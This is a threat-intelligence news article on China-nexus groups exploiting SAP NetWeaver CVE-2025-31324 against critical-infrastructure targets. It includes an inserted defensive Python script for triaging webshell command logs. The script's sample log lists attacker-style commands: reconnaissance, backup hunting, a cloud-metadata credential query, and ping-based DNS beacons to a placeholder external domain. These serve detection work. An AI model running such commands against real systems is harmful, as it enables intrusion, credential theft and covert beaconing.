Researchers at EclecticIQ assess with high confidence that, in April 2025, China-nexus nation-state APTs (Advanced Persistent Threats) launched high-tempo exploitation campaigns targeting critical infrastructure networks. These operations focused on SAP NetWeaver Visual Composer, leveraging CVE-2025-31324, an unauthenticated file upload vulnerability that allows remote code execution (RCE). The assessment is supported by evidence from a publicly exposed directory (opendir) on attacker-controlled infrastructure, which contained detailed event logs documenting activity across multiple compromised systems.

The analysts link the observed SAP NetWeaver intrusions to Chinese cyber-espionage units, including UNC5221, UNC5174, and CL-STA-0048, based on threat actor tradecraft patterns, and assess with high confidence that a China-nexus threat actor is very likely conducting a widespread internet scanning and exploitation campaign against SAP NetWeaver systems. A threat actor-controlled server at IP address 15.204.56[dot]106 exposed the scope of the intrusions.

“The threat actor hosted an openly accessible directory (opendir) on their server, which contained two result files generated using Nuclei—a mass reconnaissance tool used to scan the internet for vulnerable SAP NetWeaver instances,” Arda Büyükkaya, EclecticIQ analyst, detailed in a media statement.

The files documented both the identification of exposed systems and successful exploitation attempts, offering insight into the attacker’s victimology.

EclecticIQ analysts assess with high confidence that the Chinese-language file names and attacker tradecraft across the compromised infrastructure reinforce attribution to a Chinese-speaking operator. The exposed open-dir infrastructure reveals confirmed breaches and highlights the group’s planned targets, offering clear insight into both past and future operations.

Büyükkaya also confirmed the presence of two webshells, deployed post-exploitation to maintain persistence and remote access to victim SAP systems.

Mandiant and Palo Alto researchers assess that these groups connect to China’s Ministry of State Security (MSS) or affiliated private entities. These actors operate strategically to compromise critical infrastructure, exfiltrate sensitive data, and maintain persistent access across high-value networks worldwide.

CL-STA-0048, a Chinese state-backed APT tracked by Unit 42, has a consistent track record of targeting strategic sectors across South Asia. EclecticIQ analysts assess with high confidence that this group is likely behind the observed SAP NetWeaver intrusions. This assessment is based on overlaps in post-exploitation tactics, such as the use of the ping command for DNS beaconing, and on shared infrastructure.

EclecticIQ analysts assess with medium confidence that China-nexus group CL-STA-0048 is also likely linked to activities observed by Fortinet on October 11, 2024.

Analysis of the open-directory (open-dir) infrastructure reveals a targeted campaign against critical sectors across multiple countries. The threat actor’s victim selection reflects a strategic focus on essential services and government entities. In the U.K., targets included critical natural gas distribution networks and water and integrated waste management utilities. In the U.S., the focus was on advanced medical device manufacturing facilities and upstream oil and gas exploration and production companies. In Saudi Arabia, the campaign targeted government ministries responsible for investment strategy and financial regulation.

“Although many of the compromised entities operate within the private sector, their functions—such as delivering water to households, distributing energy, or producing advanced medical technologies—are vital to public welfare and national resilience,” Büyükkaya detailed. “The presence of persistent backdoor access to these systems provides China-aligned APTs with a foothold that may support the strategic objectives of the People’s Republic of China (PRC), including military, intelligence, and economic advantages.”

Additionally, the compromised SAP systems are deeply integrated with the internal networks of industrial control systems (ICS), which presents significant lateral movement risks. This connectivity raises the potential for short-term service disruptions and long-term espionage operations.

Following initial compromise via CVE-2025-31324, the China-nexus threat actors conducted reconnaissance on the compromised SAP NetWeaver hosts by executing Linux commands through the webshells.

“Analysis of nearly 5,000 malicious commands executed across multiple victims clearly indicates that the threat actor performed network-level discovery and mapped SAP-specific applications,” Büyükkaya said. “The actor’s goal was to identify backup details and use this metadata for lateral movement. In most of the incidents, threat actors performed network discovery using commands. Their goal was to identify nearby systems that could serve as pivots for lateral movement, including targets within cloud-connected infrastructure like AWS workloads and Entra ID (formerly Azure AD) identities.”
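The post-exploitation behaviour described above (host and network discovery, SAP-specific mapping, backup hunting, cloud/identity probing, and ping-based DNS beaconing as noted earlier in the article) is what a responder would look for when triaging a recovered webshell command log. The script below is an added example, not EclecticIQ's tooling and not derived from the opendir data: it buckets each recovered command into one of those categories, singles out ping commands whose target is an external name carrying the victim hostname or a random-looking token (the DNS lookup fires even if ICMP is blocked, which is what makes ping a quiet beacon), and reports beacon domains shared by more than one victim host. The log format (`timestamp host=… cmd=…`), the sample lines, the internal domain suffix `corp.example` and the beacon domain `c0ffee1234.example.net` are all constructed for illustration.

```python
"""Triage of commands recovered from a webshell execution log (added example).

The log format and every sample line below are constructed; they are not
data from the attacker infrastructure described in the article.
"""
import re
from collections import Counter, defaultdict

SAMPLE_LOG = """\
2025-04-29T10:02:11Z host=sapapp01 cmd=id
2025-04-29T10:02:15Z host=sapapp01 cmd=uname -a
2025-04-29T10:02:40Z host=sapapp01 cmd=cat /etc/hosts
2025-04-29T10:03:02Z host=sapapp01 cmd=ip addr show
2025-04-29T10:03:30Z host=sapapp01 cmd=netstat -antp
2025-04-29T10:04:05Z host=sapapp01 cmd=ls -la /usr/sap/PRD/SYS/profile
2025-04-29T10:04:30Z host=sapapp01 cmd=cat /usr/sap/PRD/SYS/profile/DEFAULT.PFL
2025-04-29T10:05:10Z host=sapapp01 cmd=find / -iname '*backup*' -maxdepth 4 2>/dev/null
2025-04-29T10:05:50Z host=sapapp01 cmd=curl -s http://169.254.169.254/latest/meta-data/iam/
2025-04-29T10:06:20Z host=sapapp01 cmd=ping -c 1 sapapp01.c0ffee1234.example.net
2025-04-29T10:06:25Z host=sapapp01 cmd=ping -c 2 sapdb01.corp.example
2025-04-29T10:07:00Z host=sapdb01 cmd=whoami
2025-04-29T10:07:30Z host=sapdb01 cmd=ping -c 1 sapdb01.c0ffee1234.example.net
"""

# Assumed victim-internal DNS suffixes; pings to these are ordinary reachability checks.
INTERNAL_DOMAINS = ("corp.example",)

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+cmd=(?P<cmd>.*)$")
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
HEX_TOKEN_RE = re.compile(r"[0-9a-f]{8,}", re.I)  # random-looking label, e.g. a victim ID

# Category -> pattern over the whole command line; the first match wins, so the
# more specific (SAP, backup, cloud) categories come before generic discovery.
CATEGORY_PATTERNS = [
    ("backup_discovery", re.compile(r"backup|\.bak\b|brbackup|brarchive", re.I)),
    ("sap_mapping", re.compile(r"/usr/sap|/sapmnt|sapcontrol|R3trans|hdbsql")),
    ("cloud_identity", re.compile(r"169\.254\.169\.254|\baws\b|\baz\b|microsoftonline|graph\.microsoft")),
    ("network_discovery", re.compile(r"^(ip|ifconfig|netstat|ss|arp|route|nslookup|dig|ping)\b|/etc/hosts|/etc/resolv")),
    ("host_discovery", re.compile(r"^(id|whoami|uname|hostname|ps|env)\b|/etc/passwd")),
]


def ping_target(cmd):
    """Return the last argument of a ping command, or None if cmd is not ping."""
    parts = cmd.split()
    if not parts or parts[0] != "ping":
        return None
    return parts[-1]


def is_dns_beacon(host, target, internal_domains=INTERNAL_DOMAINS):
    """Heuristic: external FQDN whose leftmost label names the victim or looks random."""
    if IPV4_RE.match(target):
        return False  # pinging a literal IP triggers no DNS lookup
    name = target.lower()
    labels = name.split(".")
    if len(labels) < 3 or any(name.endswith("." + d) for d in internal_domains):
        return False
    return labels[0] == host.lower() or bool(HEX_TOKEN_RE.search(name))


def classify(host, cmd, internal_domains=INTERNAL_DOMAINS):
    """Map one recovered command to a triage category."""
    target = ping_target(cmd)
    if target is not None and is_dns_beacon(host, target, internal_domains):
        return "dns_beacon"
    for name, pattern in CATEGORY_PATTERNS:
        if pattern.search(cmd):
            return name
    return "other"


def triage(log_text, internal_domains=INTERNAL_DOMAINS):
    """Count commands per category and collect beacon domains per victim host."""
    counts = Counter()
    beacon_hosts = defaultdict(set)  # beacon domain -> victim hosts that pinged it
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        host, cmd = m["host"], m["cmd"].strip()
        category = classify(host, cmd, internal_domains)
        counts[category] += 1
        if category == "dns_beacon":
            # Drop the per-victim leftmost label to recover the shared beacon domain.
            domain = ".".join(ping_target(cmd).lower().split(".")[1:])
            beacon_hosts[domain].add(host)
    beacon_domains = {d: sorted(h) for d, h in beacon_hosts.items()}
    shared = {d: h for d, h in beacon_domains.items() if len(h) > 1}
    return {"counts": dict(counts), "beacon_domains": beacon_domains,
            "shared_beacon_domains": shared}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for category, n in sorted(result["counts"].items()):
        print(f"{category:20s} {n}")
    print("beacon domains shared across victims:", result["shared_beacon_domains"])
```

The beacon check is deliberately a heuristic: a ping to a plain external name with no victim-specific label will be counted as ordinary network discovery, so confirm any suspected beacon against resolver or DNS-firewall logs, where the lookup is visible regardless of whether ICMP left the network. A beacon domain seen from several victim hosts is the kind of shared-infrastructure overlap the attribution discussion above relies on.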

EclecticIQ analysts assess with high confidence that the threat actor UNC5174 is very likely actively exploiting vulnerable SAP NetWeaver systems to deploy a multi-stage malware chain involving the SNOWLIGHT downloader, a Go-based Remote Access Trojan (RAT) called VShell, and GOREVERSE, a backdoor that operates over Secure Shell (SSH). Google threat researchers linked UNC5174 to the China nexus, identifying it as an initial access broker likely associated with the Ministry of State Security (MSS).

EclecticIQ’s assessment aligns with earlier findings from Google Mandiant and Sysdig, which have attributed similar TTPs to UNC5174. Mandiant previously linked UNC5174 to the exploitation of F5 BIG-IP (CVE-2023-46747) and ConnectWise ScreenConnect (CVE-2024-1709). Both of these vulnerabilities were used to deploy the SNOWLIGHT downloader.

These campaigns demonstrated UNC5174’s ability to leverage public vulnerabilities in its tradecraft and to maintain a modular infection chain built around the SNOWLIGHT downloader.

Büyükkaya noted that Sysdig’s research further confirmed the use of VShell by UNC5174 in cloud-native and containerized environments, where the group used in-memory implants and runtime evasion tactics. “The reuse of SNOWLIGHT and VShell in the SAP NetWeaver intrusions observed by EclecticIQ analysts provides strong supporting evidence of actor continuity and their target scope toward enterprise infrastructure.”

Given the consistent infrastructure, malware reuse, and tactical overlap, EclecticIQ assesses with high confidence that this activity is very likely attributable to UNC5174 and represents an ongoing campaign to exploit high-value enterprise systems.

EclecticIQ analysts assess with high confidence that China-linked APTs are highly likely to continue targeting internet-exposed enterprise applications and edge devices to establish long-term strategic, persistent access to critical infrastructure networks globally. Their focus on widely used platforms like SAP NetWeaver is a strategic move, as these systems are deeply integrated into enterprise environments and often host unpatched vulnerabilities.

“Compromising such applications, China-nexus APTs can gain high-privilege access to internal networks, including cloud services, VMware ESXi virtual machines, and operationally critical IoT/OT devices,” Büyükkaya noted. “This enables cyber espionage, sustained surveillance, and potential disruption during geopolitical crises involving China. The exposure of these essential systems transforms technical vulnerabilities into serious national and economic security threats, given their foundational role in government and business operations.”
